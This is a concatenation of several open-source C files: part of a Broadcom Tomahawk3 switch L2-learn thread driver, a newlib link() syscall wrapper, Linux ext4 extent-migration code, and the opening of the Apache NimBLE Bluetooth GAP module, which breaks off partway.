L2_LRN_MODE_INTR) { processed_cnt++; /* Check if cache full condition exists. If so, clear * it only once in this processing cycle, for each pipe, * after 1st entry is processed. (If cache fills again, * we will handle it in the next interrupt handling * cycle) */ if (full_cleared == FALSE) { soc_field_t fld = L2_LEARN_CACHE_FULLf; rv = _soc_th3_l2_learn_cache_status_check_clear( unit, pipe, &fld, 1); if (SOC_FAILURE(rv)) { LOG_ERROR(BSL_LS_SOC_COMMON, (BSL_META_U(unit, "Cache full bit" " could not be cleared in pipe %d," " index %d, rv = %d\n"), pipe, i, rv)); goto cleanup_exit; } full_cleared = TRUE; } if (thr_cleared == FALSE) { /* Clear thresold exceeded bit if number of valid * entries processed crossed the programmed * threshold value. If the threshold is set to 1, * we have already processed the entry, so we * immediately clear threshold bit */ if ((processed_cnt > soc->lrn_cache_threshold) || (soc->lrn_cache_threshold == 1)) { soc_field_t fld = L2_LEARN_CACHE_THRESHOLD_EXCEEDEDf; rv = _soc_th3_l2_learn_cache_status_check_clear( unit, pipe, &fld, 1); if (SOC_FAILURE(rv)) { LOG_ERROR(BSL_LS_SOC_COMMON, (BSL_META_U(unit, "Threshold exc. bit" " could not be cleared in pipe %d," " index %d, rv = %d\n"), pipe, i, rv)); goto cleanup_exit; } thr_cleared = TRUE; } } } } } } skip_processing: if (soc->l2x_lrn_mode == L2_LRN_MODE_INTR) { /* Enable learn cache interrupts for all pipes */ for (i = 8; i <= 15; i++) { (void)_soc_th3_lrn_cache_intr_configure(unit, i, 1); } } else { sal_usleep(interval); } } cleanup_exit: /* Check if this is required if (SOC_CONTROL(unit)->l2x_lrn_shadow != NULL) { shr_avl_destroy(SOC_CONTROL(unit)->l2x_lrn_shadow); SOC_CONTROL(unit)->l2x_lrn_shadow = NULL; } if (SOC_CONTROL(unit)->l2x_lrn_shadow_mutex != NULL) { sal_mutex_destroy(SOC_CONTROL(unit)->l2x_lrn_shadow_mutex); SOC_CONTROL(unit)->l2x_lrn_shadow_mutex = NULL; } */ if (buffer != NULL) { soc_cm_sfree(unit, buffer); } soc->l2x_learn_pid = SAL_THREAD_ERROR; sal_thread_exit(0); } /* * Function: * soc_th3_l2_learn_start * Purpose: * Start l2 learn thread * Parameters: * unit - unit number. * Returns: * SOC_E_XXX * Notes: * soc_th3_l2_learn_alloc_resources must be called before calling this function * for the _first_ time */ int soc_th3_l2_learn_thread_start(int unit, int interval) { soc_control_t *soc = SOC_CONTROL(unit); uint32 reg_val = 0; int pri = SOC_TH3_LRN_THREAD_PRI_DEFAULT; if (soc->l2x_learn_interval != 0) { SOC_IF_ERROR_RETURN(soc_th3_l2_learn_thread_stop(unit)); } SOC_CONTROL_LOCK(unit); sal_snprintf(soc->l2x_learn_name, sizeof (soc->l2x_age_name), "L2Lrn.%d", unit); if (soc->l2x_learn_pid == SAL_THREAD_ERROR) { soc_th3_l2x_lrn_mode_t mode; soc_cm_get_id(unit, &dev_id, &rev_id); if (soc_property_get(unit, spn_L2XLRN_INTR_EN, SOC_TH3_LRN_CACHE_INTR_CTL_DEFAULT)) { mode = L2_LRN_MODE_INTR; } else { mode = L2_LRN_MODE_POLL; } /* Always polled mode for simulation */ if (SAL_BOOT_BCMSIM) { mode = L2_LRN_MODE_POLL; } soc->l2x_lrn_mode = mode; /* Do not use clear-on-read by default, unless user wants it */ soc->lrn_cache_clr_on_rd = soc_property_get(unit, spn_L2XLRN_CLEAR_ON_READ, SOC_TH3_LRN_CACHE_CLR_ON_RD_DEFAULT); soc->l2x_learn_interval = interval; if (interval == 0) { SOC_CONTROL_UNLOCK(unit); return SOC_E_NONE; } /* Set initial values for learn cache operation */ SOC_IF_ERROR_RETURN(READ_L2_LEARN_COPY_CACHE_CTRLr(unit, &reg_val)); soc_reg_field_set(unit, L2_LEARN_COPY_CACHE_CTRLr, &reg_val, L2_LEARN_CACHE_ENf, 0x1); soc_reg_field_set(unit, L2_LEARN_COPY_CACHE_CTRLr, &reg_val, CLEAR_ON_READ_ENf, (uint32)(soc->lrn_cache_clr_on_rd)); if (soc->l2x_lrn_mode == L2_LRN_MODE_INTR) { /* * 1. Set default interrupt threshold (from soc property, or soc) * 2. Mark all cache entries as 'invalid' - done below this 'if' * 3. Enable l2 learn cache interrupt. */ soc->lrn_cache_threshold = soc_property_get(unit, spn_L2XLRN_INTR_THRESHOLD, SOC_TH3_LRN_CACHE_THRESHOLD_DEFAULT); /* A value of 0 or less is illegal. Also a value above 16 is * illegal, flag error */ if ((soc->lrn_cache_threshold <= 0) || (soc->lrn_cache_threshold > 16)) { LOG_ERROR(BSL_LS_SOC_COMMON, (BSL_META_U(unit, "soc_th3_l2_learn_start: Illegal value of intr" " threshold: %d\n"), soc->lrn_cache_threshold)); return SOC_E_CONFIG; } /* By default, generate interrupt only when # cache entries equals * the programmed threshold value. For generating interrupt on each * learn event, user may set spn_L2XLRN_INTR_THRESHOLD to 1 */ soc->lrn_cache_intr_ctl = 0x0; soc_reg_field_set(unit, L2_LEARN_COPY_CACHE_CTRLr, &reg_val, CACHE_INTERRUPT_CTRLf, (uint32)(soc->lrn_cache_intr_ctl)); soc_reg_field_set(unit, L2_LEARN_COPY_CACHE_CTRLr, &reg_val, CACHE_INTERRUPT_THRESHOLDf, (uint32)(soc->lrn_cache_threshold)); } else { soc->lrn_cache_intr_ctl = 0x0; /* In polled mode, set these fields to reset values */ soc_reg_field_set(unit, L2_LEARN_COPY_CACHE_CTRLr, &reg_val, CACHE_INTERRUPT_CTRLf, (uint32)(soc->lrn_cache_intr_ctl)); soc_reg_field_set(unit, L2_LEARN_COPY_CACHE_CTRLr, &reg_val, CACHE_INTERRUPT_THRESHOLDf, 0x8); } SOC_IF_ERROR_RETURN(WRITE_L2_LEARN_COPY_CACHE_CTRLr(unit, reg_val)); /* Clear all entries of L2 learn cache */ SOC_IF_ERROR_RETURN(soc_th3_l2_learn_cache_clear(unit)); /* Reset cache status bits */ SOC_IF_ERROR_RETURN(soc_th3_l2_learn_cache_status_clear(unit)); pri = soc_property_get(unit, spn_L2XLRN_THREAD_PRI, SOC_TH3_LRN_THREAD_PRI_DEFAULT); /* Make sure that learn cache interrupt is enabled in CMICx, * later in the main initialization sequence */ soc->l2x_learn_pid = sal_thread_create(soc->l2x_learn_name, SAL_THREAD_STKSZ, pri, _soc_th3_l2_learn_process, INT_TO_PTR(unit)); if (soc->l2x_learn_pid == SAL_THREAD_ERROR) { LOG_ERROR(BSL_LS_SOC_COMMON, (BSL_META_U(unit, "soc_th3_l2_learn_start: Could not start L2 learn" " thread\n"))); SOC_CONTROL_UNLOCK(unit); return SOC_E_MEMORY; } } SOC_CONTROL_UNLOCK(unit); /* More programming might be reqd depending on learn cache en/dis setting */ return SOC_E_NONE; } int soc_th3_l2_learn_thread_stop(int unit) { soc_control_t *soc = SOC_CONTROL(unit); int rv = SOC_E_NONE; soc_timeout_t to; sal_usecs_t interval; LOG_INFO(BSL_LS_SOC_ARL, (BSL_META_U(unit, "Stopping learn" " thread: unit=%d\n"), unit)); /* Save interval to wait for thread to wake up again */ if (SAL_BOOT_SIMULATION) { /* Allow more time on simulation, similar to other devices */ interval = 30 * 1000000; } else { interval = 10 * 1000000; } SOC_CONTROL_LOCK(unit); soc->l2x_learn_interval = 0; /* Request exit */ SOC_CONTROL_UNLOCK(unit); if (soc->l2x_learn_pid != SAL_THREAD_ERROR) { if (soc->l2x_lrn_mode == L2_LRN_MODE_INTR) { int i; /* Disable learn cache interrupts from all pipes */ for (i = 8; i <= 15; i++) { (void)_soc_th3_lrn_cache_intr_configure(unit, i, 0); } } /* Wake up thread so it will check the exit flag */ /*sal_sem_give(soc->arl_notify); Check if notification to learn thread is required */ /* Give thread a few seconds to wake up and exit */ soc_timeout_init(&to, interval, 0); LOG_INFO(BSL_LS_SOC_COMMON, (BSL_META_U(unit, "Learn thread stop: Wait may be longer if" " cfg polling interval is high, cfg interval = %u\n"), interval)); while (soc->l2x_learn_pid != SAL_THREAD_ERROR) { if (soc_timeout_check(&to)) { LOG_ERROR(BSL_LS_SOC_L2, (BSL_META_U(unit, "Learn thread did not stop\n"))); rv = SOC_E_INTERNAL; break; } } } return (rv); } int soc_th3_l2_learn_thread_running(int unit, sal_usecs_t* interval) { soc_control_t *soc = SOC_CONTROL(unit); if (soc->l2x_learn_pid != SAL_THREAD_ERROR) { if (interval != NULL) { *interval = soc->l2x_learn_interval; } } return(soc->l2x_learn_pid != SAL_THREAD_ERROR); } #endif /* BCM_XGS_SWITCH_SUPPORT */ #endif /* BCM_TOMAHAWK3_SUPPORT */
783216.c
/* connector for link */ #include <reent.h> int _DEFUN (link, (old, new), char *old _AND char *new) { #ifdef REENTRANT_SYSCALLS_PROVIDED return _link_r (_REENT, old, new); #else return _link (old, new); #endif }
93772.c
/* * Copyright IBM Corporation, 2007 * Author Aneesh Kumar K.V <aneesh.kumar@linux.vnet.ibm.com> * * This program is free software; you can redistribute it and/or modify it * under the terms of version 2.1 of the GNU Lesser General Public License * as published by the Free Software Foundation. * * This program is distributed in the hope that it would be useful, but * WITHOUT ANY WARRANTY; without even the implied warranty of * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. * */ #include <linux/module.h> #include <linux/slab.h> #include "ext4_jbd2.h" #include "ext4_extents.h" /* * The contiguous blocks details which can be * represented by a single extent */ struct list_blocks_struct { ext4_lblk_t first_block, last_block; ext4_fsblk_t first_pblock, last_pblock; }; static int finish_range(handle_t *handle, struct inode *inode, struct list_blocks_struct *lb) { int retval = 0, needed; struct ext4_extent newext; struct ext4_ext_path *path; if (lb->first_pblock == 0) return 0; /* Add the extent to temp inode*/ newext.ee_block = cpu_to_le32(lb->first_block); newext.ee_len = cpu_to_le16(lb->last_block - lb->first_block + 1); ext4_ext_store_pblock(&newext, lb->first_pblock); path = ext4_ext_find_extent(inode, lb->first_block, NULL); if (IS_ERR(path)) { retval = PTR_ERR(path); path = NULL; goto err_out; } /* * Calculate the credit needed to inserting this extent * Since we are doing this in loop we may accumalate extra * credit. But below we try to not accumalate too much * of them by restarting the journal. */ needed = ext4_ext_calc_credits_for_single_extent(inode, lb->last_block - lb->first_block + 1, path); /* * Make sure the credit we accumalated is not really high */ if (needed && ext4_handle_has_enough_credits(handle, EXT4_RESERVE_TRANS_BLOCKS)) { retval = ext4_journal_restart(handle, needed); if (retval) goto err_out; } else if (needed) { retval = ext4_journal_extend(handle, needed); if (retval) { /* * IF not able to extend the journal restart the journal */ retval = ext4_journal_restart(handle, needed); if (retval) goto err_out; } } retval = ext4_ext_insert_extent(handle, inode, path, &newext, 0); err_out: if (path) { ext4_ext_drop_refs(path); kfree(path); } lb->first_pblock = 0; return retval; } static int update_extent_range(handle_t *handle, struct inode *inode, ext4_fsblk_t pblock, ext4_lblk_t blk_num, struct list_blocks_struct *lb) { int retval; /* * See if we can add on to the existing range (if it exists) */ if (lb->first_pblock && (lb->last_pblock+1 == pblock) && (lb->last_block+1 == blk_num)) { lb->last_pblock = pblock; lb->last_block = blk_num; return 0; } /* * Start a new range. */ retval = finish_range(handle, inode, lb); lb->first_pblock = lb->last_pblock = pblock; lb->first_block = lb->last_block = blk_num; return retval; } static int update_ind_extent_range(handle_t *handle, struct inode *inode, ext4_fsblk_t pblock, ext4_lblk_t *blk_nump, struct list_blocks_struct *lb) { struct buffer_head *bh; __le32 *i_data; int i, retval = 0; ext4_lblk_t blk_count = *blk_nump; unsigned long max_entries = inode->i_sb->s_blocksize >> 2; if (!pblock) { /* Only update the file block number */ *blk_nump += max_entries; return 0; } bh = sb_bread(inode->i_sb, pblock); if (!bh) return -EIO; i_data = (__le32 *)bh->b_data; for (i = 0; i < max_entries; i++, blk_count++) { if (i_data[i]) { retval = update_extent_range(handle, inode, le32_to_cpu(i_data[i]), blk_count, lb); if (retval) break; } } /* Update the file block number */ *blk_nump = blk_count; put_bh(bh); return retval; } static int update_dind_extent_range(handle_t *handle, struct inode *inode, ext4_fsblk_t pblock, ext4_lblk_t *blk_nump, struct list_blocks_struct *lb) { struct buffer_head *bh; __le32 *i_data; int i, retval = 0; ext4_lblk_t blk_count = *blk_nump; unsigned long max_entries = inode->i_sb->s_blocksize >> 2; if (!pblock) { /* Only update the file block number */ *blk_nump += max_entries * max_entries; return 0; } bh = sb_bread(inode->i_sb, pblock); if (!bh) return -EIO; i_data = (__le32 *)bh->b_data; for (i = 0; i < max_entries; i++) { if (i_data[i]) { retval = update_ind_extent_range(handle, inode, le32_to_cpu(i_data[i]), &blk_count, lb); if (retval) break; } else { /* Only update the file block number */ blk_count += max_entries; } } /* Update the file block number */ *blk_nump = blk_count; put_bh(bh); return retval; } static int update_tind_extent_range(handle_t *handle, struct inode *inode, ext4_fsblk_t pblock, ext4_lblk_t *blk_nump, struct list_blocks_struct *lb) { struct buffer_head *bh; __le32 *i_data; int i, retval = 0; ext4_lblk_t blk_count = *blk_nump; unsigned long max_entries = inode->i_sb->s_blocksize >> 2; if (!pblock) { /* Only update the file block number */ *blk_nump += max_entries * max_entries * max_entries; return 0; } bh = sb_bread(inode->i_sb, pblock); if (!bh) return -EIO; i_data = (__le32 *)bh->b_data; for (i = 0; i < max_entries; i++) { if (i_data[i]) { retval = update_dind_extent_range(handle, inode, le32_to_cpu(i_data[i]), &blk_count, lb); if (retval) break; } else /* Only update the file block number */ blk_count += max_entries * max_entries; } /* Update the file block number */ *blk_nump = blk_count; put_bh(bh); return retval; } static int extend_credit_for_blkdel(handle_t *handle, struct inode *inode) { int retval = 0, needed; if (ext4_handle_has_enough_credits(handle, EXT4_RESERVE_TRANS_BLOCKS+1)) return 0; /* * We are freeing a blocks. During this we touch * superblock, group descriptor and block bitmap. * So allocate a credit of 3. We may update * quota (user and group). */ needed = 3 + EXT4_MAXQUOTAS_TRANS_BLOCKS(inode->i_sb); if (ext4_journal_extend(handle, needed) != 0) retval = ext4_journal_restart(handle, needed); return retval; } static int free_dind_blocks(handle_t *handle, struct inode *inode, __le32 i_data) { int i; __le32 *tmp_idata; struct buffer_head *bh; unsigned long max_entries = inode->i_sb->s_blocksize >> 2; bh = sb_bread(inode->i_sb, le32_to_cpu(i_data)); if (!bh) return -EIO; tmp_idata = (__le32 *)bh->b_data; for (i = 0; i < max_entries; i++) { if (tmp_idata[i]) { extend_credit_for_blkdel(handle, inode); ext4_free_blocks(handle, inode, 0, le32_to_cpu(tmp_idata[i]), 1, EXT4_FREE_BLOCKS_METADATA | EXT4_FREE_BLOCKS_FORGET); } } put_bh(bh); extend_credit_for_blkdel(handle, inode); ext4_free_blocks(handle, inode, 0, le32_to_cpu(i_data), 1, EXT4_FREE_BLOCKS_METADATA | EXT4_FREE_BLOCKS_FORGET); return 0; } static int free_tind_blocks(handle_t *handle, struct inode *inode, __le32 i_data) { int i, retval = 0; __le32 *tmp_idata; struct buffer_head *bh; unsigned long max_entries = inode->i_sb->s_blocksize >> 2; bh = sb_bread(inode->i_sb, le32_to_cpu(i_data)); if (!bh) return -EIO; tmp_idata = (__le32 *)bh->b_data; for (i = 0; i < max_entries; i++) { if (tmp_idata[i]) { retval = free_dind_blocks(handle, inode, tmp_idata[i]); if (retval) { put_bh(bh); return retval; } } } put_bh(bh); extend_credit_for_blkdel(handle, inode); ext4_free_blocks(handle, inode, 0, le32_to_cpu(i_data), 1, EXT4_FREE_BLOCKS_METADATA | EXT4_FREE_BLOCKS_FORGET); return 0; } static int free_ind_block(handle_t *handle, struct inode *inode, __le32 *i_data) { int retval; /* ei->i_data[EXT4_IND_BLOCK] */ if (i_data[0]) { extend_credit_for_blkdel(handle, inode); ext4_free_blocks(handle, inode, 0, le32_to_cpu(i_data[0]), 1, EXT4_FREE_BLOCKS_METADATA | EXT4_FREE_BLOCKS_FORGET); } /* ei->i_data[EXT4_DIND_BLOCK] */ if (i_data[1]) { retval = free_dind_blocks(handle, inode, i_data[1]); if (retval) return retval; } /* ei->i_data[EXT4_TIND_BLOCK] */ if (i_data[2]) { retval = free_tind_blocks(handle, inode, i_data[2]); if (retval) return retval; } return 0; } static int ext4_ext_swap_inode_data(handle_t *handle, struct inode *inode, struct inode *tmp_inode) { int retval; __le32 i_data[3]; struct ext4_inode_info *ei = EXT4_I(inode); struct ext4_inode_info *tmp_ei = EXT4_I(tmp_inode); /* * One credit accounted for writing the * i_data field of the original inode */ retval = ext4_journal_extend(handle, 1); if (retval) { retval = ext4_journal_restart(handle, 1); if (retval) goto err_out; } i_data[0] = ei->i_data[EXT4_IND_BLOCK]; i_data[1] = ei->i_data[EXT4_DIND_BLOCK]; i_data[2] = ei->i_data[EXT4_TIND_BLOCK]; down_write(&EXT4_I(inode)->i_data_sem); /* * if EXT4_STATE_EXT_MIGRATE is cleared a block allocation * happened after we started the migrate. We need to * fail the migrate */ if (!ext4_test_inode_state(inode, EXT4_STATE_EXT_MIGRATE)) { retval = -EAGAIN; up_write(&EXT4_I(inode)->i_data_sem); goto err_out; } else ext4_clear_inode_state(inode, EXT4_STATE_EXT_MIGRATE); /* * We have the extent map build with the tmp inode. * Now copy the i_data across */ ei->i_flags |= EXT4_EXTENTS_FL; memcpy(ei->i_data, tmp_ei->i_data, sizeof(ei->i_data)); /* * Update i_blocks with the new blocks that got * allocated while adding extents for extent index * blocks. * * While converting to extents we need not * update the orignal inode i_blocks for extent blocks * via quota APIs. The quota update happened via tmp_inode already. */ spin_lock(&inode->i_lock); inode->i_blocks += tmp_inode->i_blocks; spin_unlock(&inode->i_lock); up_write(&EXT4_I(inode)->i_data_sem); /* * We mark the inode dirty after, because we decrement the * i_blocks when freeing the indirect meta-data blocks */ retval = free_ind_block(handle, inode, i_data); ext4_mark_inode_dirty(handle, inode); err_out: return retval; } static int free_ext_idx(handle_t *handle, struct inode *inode, struct ext4_extent_idx *ix) { int i, retval = 0; ext4_fsblk_t block; struct buffer_head *bh; struct ext4_extent_header *eh; block = idx_pblock(ix); bh = sb_bread(inode->i_sb, block); if (!bh) return -EIO; eh = (struct ext4_extent_header *)bh->b_data; if (eh->eh_depth != 0) { ix = EXT_FIRST_INDEX(eh); for (i = 0; i < le16_to_cpu(eh->eh_entries); i++, ix++) { retval = free_ext_idx(handle, inode, ix); if (retval) break; } } put_bh(bh); extend_credit_for_blkdel(handle, inode); ext4_free_blocks(handle, inode, 0, block, 1, EXT4_FREE_BLOCKS_METADATA | EXT4_FREE_BLOCKS_FORGET); return retval; } /* * Free the extent meta data blocks only */ static int free_ext_block(handle_t *handle, struct inode *inode) { int i, retval = 0; struct ext4_inode_info *ei = EXT4_I(inode); struct ext4_extent_header *eh = (struct ext4_extent_header *)ei->i_data; struct ext4_extent_idx *ix; if (eh->eh_depth == 0) /* * No extra blocks allocated for extent meta data */ return 0; ix = EXT_FIRST_INDEX(eh); for (i = 0; i < le16_to_cpu(eh->eh_entries); i++, ix++) { retval = free_ext_idx(handle, inode, ix); if (retval) return retval; } return retval; } int ext4_ext_migrate(struct inode *inode) { handle_t *handle; int retval = 0, i; __le32 *i_data; ext4_lblk_t blk_count = 0; struct ext4_inode_info *ei; struct inode *tmp_inode = NULL; struct list_blocks_struct lb; unsigned long max_entries; __u32 goal; /* * If the filesystem does not support extents, or the inode * already is extent-based, error out. */ if (!EXT4_HAS_INCOMPAT_FEATURE(inode->i_sb, EXT4_FEATURE_INCOMPAT_EXTENTS) || (EXT4_I(inode)->i_flags & EXT4_EXTENTS_FL)) return -EINVAL; if (S_ISLNK(inode->i_mode) && inode->i_blocks == 0) /* * don't migrate fast symlink */ return retval; handle = ext4_journal_start(inode, EXT4_DATA_TRANS_BLOCKS(inode->i_sb) + EXT4_INDEX_EXTRA_TRANS_BLOCKS + 3 + EXT4_MAXQUOTAS_INIT_BLOCKS(inode->i_sb) + 1); if (IS_ERR(handle)) { retval = PTR_ERR(handle); return retval; } goal = (((inode->i_ino - 1) / EXT4_INODES_PER_GROUP(inode->i_sb)) * EXT4_INODES_PER_GROUP(inode->i_sb)) + 1; tmp_inode = ext4_new_inode(handle, inode->i_sb->s_root->d_inode, S_IFREG, 0, goal); if (IS_ERR(tmp_inode)) { retval = -ENOMEM; ext4_journal_stop(handle); return retval; } i_size_write(tmp_inode, i_size_read(inode)); /* * Set the i_nlink to zero so it will be deleted later * when we drop inode reference. */ tmp_inode->i_nlink = 0; ext4_ext_tree_init(handle, tmp_inode); ext4_orphan_add(handle, tmp_inode); ext4_journal_stop(handle); /* * start with one credit accounted for * superblock modification. * * For the tmp_inode we already have commited the * trascation that created the inode. Later as and * when we add extents we extent the journal */ /* * Even though we take i_mutex we can still cause block * allocation via mmap write to holes. If we have allocated * new blocks we fail migrate. New block allocation will * clear EXT4_STATE_EXT_MIGRATE flag. The flag is updated * with i_data_sem held to prevent racing with block * allocation. */ down_read((&EXT4_I(inode)->i_data_sem)); ext4_set_inode_state(inode, EXT4_STATE_EXT_MIGRATE); up_read((&EXT4_I(inode)->i_data_sem)); handle = ext4_journal_start(inode, 1); if (IS_ERR(handle)) { /* * It is impossible to update on-disk structures without * a handle, so just rollback in-core changes and live other * work to orphan_list_cleanup() */ ext4_orphan_del(NULL, tmp_inode); retval = PTR_ERR(handle); goto out; } ei = EXT4_I(inode); i_data = ei->i_data; memset(&lb, 0, sizeof(lb)); /* 32 bit block address 4 bytes */ max_entries = inode->i_sb->s_blocksize >> 2; for (i = 0; i < EXT4_NDIR_BLOCKS; i++, blk_count++) { if (i_data[i]) { retval = update_extent_range(handle, tmp_inode, le32_to_cpu(i_data[i]), blk_count, &lb); if (retval) goto err_out; } } if (i_data[EXT4_IND_BLOCK]) { retval = update_ind_extent_range(handle, tmp_inode, le32_to_cpu(i_data[EXT4_IND_BLOCK]), &blk_count, &lb); if (retval) goto err_out; } else blk_count += max_entries; if (i_data[EXT4_DIND_BLOCK]) { retval = update_dind_extent_range(handle, tmp_inode, le32_to_cpu(i_data[EXT4_DIND_BLOCK]), &blk_count, &lb); if (retval) goto err_out; } else blk_count += max_entries * max_entries; if (i_data[EXT4_TIND_BLOCK]) { retval = update_tind_extent_range(handle, tmp_inode, le32_to_cpu(i_data[EXT4_TIND_BLOCK]), &blk_count, &lb); if (retval) goto err_out; } /* * Build the last extent */ retval = finish_range(handle, tmp_inode, &lb); err_out: if (retval) /* * Failure case delete the extent information with the * tmp_inode */ free_ext_block(handle, tmp_inode); else { retval = ext4_ext_swap_inode_data(handle, inode, tmp_inode); if (retval) /* * if we fail to swap inode data free the extent * details of the tmp inode */ free_ext_block(handle, tmp_inode); } /* We mark the tmp_inode dirty via ext4_ext_tree_init. */ if (ext4_journal_extend(handle, 1) != 0) ext4_journal_restart(handle, 1); /* * Mark the tmp_inode as of size zero */ i_size_write(tmp_inode, 0); /* * set the i_blocks count to zero * so that the ext4_delete_inode does the * right job * * We don't need to take the i_lock because * the inode is not visible to user space. */ tmp_inode->i_blocks = 0; /* Reset the extent details */ ext4_ext_tree_init(handle, tmp_inode); ext4_journal_stop(handle); out: unlock_new_inode(tmp_inode); iput(tmp_inode); return retval; }
465873.c
/* * Licensed to the Apache Software Foundation (ASF) under one * or more contributor license agreements. See the NOTICE file * distributed with this work for additional information * regarding copyright ownership. The ASF licenses this file * to you under the Apache License, Version 2.0 (the * "License"); you may not use this file except in compliance * with the License. You may obtain a copy of the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, * software distributed under the License is distributed on an * "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY * KIND, either express or implied. See the License for the * specific language governing permissions and limitations * under the License. */ #include <assert.h> #include <string.h> #include <errno.h> #include "nimble/nimble_opt.h" #include "host/ble_hs_adv.h" #include "host/ble_hs_hci.h" #include "ble_hs_priv.h" #if MYNEWT #include "bsp/bsp.h" #else #define bssnz_t #endif /** * GAP - Generic Access Profile. * * Design overview: * * GAP procedures are initiated by the application via function calls. Such * functions return when either of the following happens: * * (1) The procedure completes (success or failure). * (2) The procedure cannot proceed until a BLE peer responds. * * For (1), the result of the procedure if fully indicated by the function * return code. * For (2), the procedure result is indicated by an application-configured * callback. The callback is executed when the procedure completes. * * The GAP is always in one of two states: * 1. Free * 2. Preempted * * While GAP is in the free state, new procedures can be started at will. * While GAP is in the preempted state, no new procedures are allowed. The * host sets GAP to the preempted state when it needs to ensure no ongoing * procedures, a condition required for some HCI commands to succeed. The host * must take care to take GAP out of the preempted state as soon as possible. * * Notes on thread-safety: * 1. The ble_hs mutex must always be unlocked when an application callback is * executed. The purpose of this requirement is to allow callbacks to * initiate additional host procedures, which may require locking of the * mutex. * 2. Functions called directly by the application never call callbacks. * Generally, these functions lock the ble_hs mutex at the start, and only * unlock it at return. * 3. Functions which do call callbacks (receive handlers and timer * expirations) generally only lock the mutex long enough to modify * affected state and make copies of data needed for the callback. A copy * of various pieces of data is called a "snapshot" (struct * ble_gap_snapshot). The sole purpose of snapshots is to allow callbacks * to be executed after unlocking the mutex. */ /** GAP procedure op codes. */ #define BLE_GAP_OP_NULL 0 #define BLE_GAP_OP_M_DISC 1 #define BLE_GAP_OP_M_CONN 2 #define BLE_GAP_OP_S_ADV 1 #define BLE_GAP_OP_S_PERIODIC_ADV 2 #define BLE_GAP_OP_SYNC 1 /** * If an attempt to cancel an active procedure fails, the attempt is retried * at this rate (ms). */ #define BLE_GAP_CANCEL_RETRY_TIMEOUT_MS 100 /* ms */ #define BLE_GAP_UPDATE_TIMEOUT_MS 40000 /* ms */ #if MYNEWT_VAL(BLE_ROLE_CENTRAL) static const struct ble_gap_conn_params ble_gap_conn_params_dflt = { .scan_itvl = 0x0010, .scan_window = 0x0010, .itvl_min = BLE_GAP_INITIAL_CONN_ITVL_MIN, .itvl_max = BLE_GAP_INITIAL_CONN_ITVL_MAX, .latency = BLE_GAP_INITIAL_CONN_LATENCY, .supervision_timeout = BLE_GAP_INITIAL_SUPERVISION_TIMEOUT, .min_ce_len = BLE_GAP_INITIAL_CONN_MIN_CE_LEN, .max_ce_len = BLE_GAP_INITIAL_CONN_MAX_CE_LEN, }; #endif /** * The state of the in-progress master connection. If no master connection is * currently in progress, then the op field is set to BLE_GAP_OP_NULL. */ struct ble_gap_master_state { uint8_t op; uint8_t exp_set:1; ble_npl_time_t exp_os_ticks; ble_gap_event_fn *cb; void *cb_arg; /** * Indicates the type of master procedure that was preempted, or * BLE_GAP_OP_NULL if no procedure was preempted. */ uint8_t preempted_op; union { struct { uint8_t using_wl:1; uint8_t our_addr_type:2; uint8_t cancel:1; } conn; struct { uint8_t limited:1; } disc; }; }; static bssnz_t struct ble_gap_master_state ble_gap_master; #if MYNEWT_VAL(BLE_PERIODIC_ADV) /** * The state of the in-progress sync creation. If no sync creation connection is * currently in progress, then the op field is set to BLE_GAP_OP_NULL. */ struct ble_gap_sync_state { uint8_t op; struct ble_hs_periodic_sync *psync; ble_gap_event_fn *cb; void *cb_arg; }; static bssnz_t struct ble_gap_sync_state ble_gap_sync; #endif /** * The state of the in-progress slave connection. If no slave connection is * currently in progress, then the op field is set to BLE_GAP_OP_NULL. */ struct ble_gap_slave_state { uint8_t op; unsigned int our_addr_type:2; unsigned int preempted:1; /** Set to 1 if advertising was preempted. */ unsigned int connectable:1; #if MYNEWT_VAL(BLE_EXT_ADV) unsigned int configured:1; /** If instance is configured */ unsigned int scannable:1; unsigned int directed:1; unsigned int high_duty_directed:1; unsigned int legacy_pdu:1; unsigned int rnd_addr_set:1; #if MYNEWT_VAL(BLE_PERIODIC_ADV) unsigned int periodic_configured:1; uint8_t periodic_op; #endif uint8_t rnd_addr[6]; #else /* timer is used only with legacy advertising */ unsigned int exp_set:1; ble_npl_time_t exp_os_ticks; #endif ble_gap_event_fn *cb; void *cb_arg; }; static bssnz_t struct ble_gap_slave_state ble_gap_slave[BLE_ADV_INSTANCES]; struct ble_gap_update_entry { SLIST_ENTRY(ble_gap_update_entry) next; struct ble_gap_upd_params params; ble_npl_time_t exp_os_ticks; uint16_t conn_handle; }; SLIST_HEAD(ble_gap_update_entry_list, ble_gap_update_entry); struct ble_gap_snapshot { struct ble_gap_conn_desc *desc; ble_gap_event_fn *cb; void *cb_arg; }; static SLIST_HEAD(ble_gap_hook_list, ble_gap_event_listener) ble_gap_event_listener_list; static os_membuf_t ble_gap_update_entry_mem[ OS_MEMPOOL_SIZE(MYNEWT_VAL(BLE_GAP_MAX_PENDING_CONN_PARAM_UPDATE), sizeof (struct ble_gap_update_entry))]; static struct os_mempool ble_gap_update_entry_pool; static struct ble_gap_update_entry_list ble_gap_update_entries; static void ble_gap_update_entry_free(struct ble_gap_update_entry *entry); #if NIMBLE_BLE_CONNECT static struct ble_gap_update_entry * ble_gap_update_entry_find(uint16_t conn_handle, struct ble_gap_update_entry **out_prev); static void ble_gap_update_l2cap_cb(uint16_t conn_handle, int status, void *arg); #endif static struct ble_gap_update_entry * ble_gap_update_entry_remove(uint16_t conn_handle); #if NIMBLE_BLE_ADVERTISE && !MYNEWT_VAL(BLE_EXT_ADV) static int ble_gap_adv_enable_tx(int enable); #endif static int ble_gap_conn_cancel_tx(void); #if NIMBLE_BLE_SCAN && !MYNEWT_VAL(BLE_EXT_ADV) static int ble_gap_disc_enable_tx(int enable, int filter_duplicates); #endif STATS_SECT_DECL(ble_gap_stats) ble_gap_stats; STATS_NAME_START(ble_gap_stats) STATS_NAME(ble_gap_stats, wl_set) STATS_NAME(ble_gap_stats, wl_set_fail) STATS_NAME(ble_gap_stats, adv_stop) STATS_NAME(ble_gap_stats, adv_stop_fail) STATS_NAME(ble_gap_stats, adv_start) STATS_NAME(ble_gap_stats, adv_start_fail) STATS_NAME(ble_gap_stats, adv_set_data) STATS_NAME(ble_gap_stats, adv_set_data_fail) STATS_NAME(ble_gap_stats, adv_rsp_set_data) STATS_NAME(ble_gap_stats, adv_rsp_set_data_fail) STATS_NAME(ble_gap_stats, discover) 